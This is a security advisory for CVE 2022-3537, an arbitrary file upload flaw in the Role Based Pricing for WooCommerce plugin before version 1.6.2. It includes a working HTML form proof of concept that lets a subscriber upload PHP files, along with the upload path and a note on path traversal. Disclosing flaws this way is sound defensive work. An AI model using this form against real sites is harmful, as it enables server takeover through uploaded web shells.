Role Based Pricing for WooCommerce < 1.6.2 – Subscriber+ Arbitrary File Upload | CVE 2022-3537

Description

The plugin does not have authorisation and proper CSRF checks, and does not validate files to be uploaded, allowing any authenticated users like subscriber to upload arbitrary files, such as PHP

Proof of Concept

As a subscriber, open the HTML code below while being logged in as a subscriber, then choose a file to upload and submit it

<form action="https://example.com/wp-admin/admin-ajax.php?action=afcsp_upload_csv" method="POST" enctype="multipart/form-data">
    <input type="file" name="afcsp_import_file" value="File to upload">
    <input type="submit" name="submit" value="submit">
</form>

The file will be uploaded at https://example.com/wp-content/uploads/addify-role-pricing/ and have the same name than the original (path can also be found in the upload response). Path traversal vector could also be used to upload the file anywhere